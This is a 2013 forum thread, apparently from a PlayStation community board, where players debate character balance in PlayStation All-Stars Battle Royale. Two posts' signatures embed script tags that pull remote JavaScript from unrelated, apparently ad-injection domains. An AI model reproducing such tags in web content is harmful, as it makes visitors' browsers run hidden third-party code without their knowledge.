Feb 05 2013
By: El-Sadasda First Son 6 posts

Kratos and Raiden needs a nerf. (And a little bit Radec)

39 replies 544 views Edited Feb 5, 2013

Hello people, the reason why I say this is because, I was playing in the resistance map, and a stupid Kratos, got Level 3 super, 2 times :s, he totally needs a nerf, he should be like Dante, he doesn't gain much AP, but his combos are awesome, and make him get AP decently. But kratos only spam Square, and throws you with its stupid chain grab. And the people that's says "Use L1, block his attacks", it doesn't really works because, you need to attack him, and when you attack him, he uses the stupid chain grab in makes you fly. And if you are in air, he jumps and do the stupid "Tornado" (Not the super 2, a thing that he press square in air and do like a stupid tornado). Anyways, They should make his attacks to gain a very little amount of AP, and increase the AP Required for his supers. And a delay, for his chain grab.

About Raiden, he is not bad, but gains AP fast too, his combos make him gain like a level 1 and a half. And his super one, is very , umm its hard to dodge (YOURE MINE HEIHEUHEUEHUE) and can kill a lot of enemies. Im going to say the same crap I say'd with kratos, he should be like dante.

And about radec, only his sniper, if he hits you, he make you fly....and if you're close to him, he hit you with its shotgun, and makes you fly again, and keeps spamming the sniper, but that thing is easy to dodge, you roll to where he is and you start hitting him. And the sniper makes him gain AP Brutally. It should have a Delay for the sniper and gain less AP. (I use Sir Daniel, so he's no challenge.)

Anyway that's what I have to say. Im **bleep** with Kratos. And the worst, is that he's the most commonly used character (With Raiden I suppose).

So, that's it I think, Take care.

PD: Sorry if my English sucks, but thats not my main lenguaje.

Please use plain text.
Message 1 of 40 (544 Views)
I Only Post Everything
1051 posts

Re: Kratos and Raiden needs a nerf. (And a little bit Radec)

Feb 5, 2013
Not really radec. But i agree with kratos and raiden. :smileytongue:
all stars photo psasbr2_zpsc1059804.png

My raiden over all your mains.
#PSASBR2
Please use plain text.
Message 2 of 40 (534 Views)
0 Likes
Monster Hunter
35 posts

[ Edited ]
Feb 5, 2013

Radec needs a nerf!?... Yeah maybe they should remove his "weaponry" and give him a bubbles gun ¬¬... Radec really needs a buff

By the way, mm Kratos is fine to me, a little annoying his chain grab since it's homing, but is not impossible since his supers are not that good. Raiden... he is another story :smileyfrustrated:

Please use plain text.
Message 3 of 40 (519 Views)
0 Likes
Fender Bender
2516 posts

Feb 5, 2013

They already nerfed them hard.

Please use plain text.
Message 4 of 40 (513 Views)
Gaming Beast
2167 posts

Feb 5, 2013
Yeah, Raiden already got overnerfed.

Radec is one of the worst characters in the game already. Just don't ignore him and he sucks.

IDK what to think about Kratos. He's not a good character per se, but I can see why people hate his super spammable square moves. Those things are **bleep** near impossible to punish for some characters (Need to block then roll at just the right time, then if you have a long enough grab range grab him). The problem is that outside of FFA Kratos is NOT a good character, so if you were to nerf him by say actually putting even mild ending lag on his square moves he might end up requiring a buff elsewhere to stay viable.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Please use plain text.
Message 5 of 40 (501 Views)
0 Likes
First Son
6 posts

Feb 5, 2013

What? Really raiden got nerfed, well, I got this game in December, so, I don't really know how he was before :s, well, he is still very, very op, they should re-nerfing (I know that's stupid), and kratos.....well, everyone hates him so we all are agree with that :smileyhappy:

Please use plain text.
Message 6 of 40 (464 Views)
0 Likes
Wastelander
825 posts

[ Edited ]
Feb 5, 2013

Raidan didn't get nerfed got a bug fix. Also RADEC NEEDS NO NERF. You can dodge his sniper and his shotgun has the WORSE RANGE for any weapon IMO. It shouldn't even be outclassed by sweet tooth's shotgun simply because Radec is all about guns and sweet tooth was all about cars.

Please use plain text.
Message 7 of 40 (452 Views)
0 Likes
Gaming Beast
2167 posts

Feb 5, 2013
He is most definitely not OP. Raiden really has no way to properly open you up anymore. The only reason people have an issue with him is that they don't pay attention to him/know how to deal with him in 4 player games, just like with Radec.

Raiden straight up loses to AT LEAST the following characters:

-Both Coles
-Ratchet
-Dan
-Big Daddy
-Jak

That's at least 6 bad matchups, and I hear Raiden players complain about Sweet Tooth as well.

As it stands now, Raiden has no effective way to stop you from just blocking and punishing his ending lag. He's high mid tier at absolute best.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Please use plain text.
Message 8 of 40 (450 Views)
0 Likes
Survivor
2388 posts

Feb 5, 2013

Fromundaman wrote:
He is most definitely not OP. Raiden really has no way to properly open you up anymore. The only reason people have an issue with him is that they don't pay attention to him/know how to deal with him in 4 player games, just like with Radec.

Raiden straight up loses to AT LEAST the following characters:

-Both Coles
-Ratchet
-Dan
-Big Daddy
-Jak

That's at least 6 bad matchups, and I hear Raiden players complain about Sweet Tooth as well.

As it stands now, Raiden has no effective way to stop you from just blocking and punishing his ending lag. He's high mid tier at absolute best.
That doesnt change the fact that he has the most KC's next to Fat Princess. once they do manage to get the level 1 its a guaranteed kill unless they dont know the move. 

Please use plain text.
Message 9 of 40 (446 Views)
0 Likes
Fender Bender
2319 posts

Feb 5, 2013

MarrowOchi wrote:

They already nerfed them hard.

Not really. :smileyindifferent:

Please use plain text.
Message 10 of 40 (436 Views)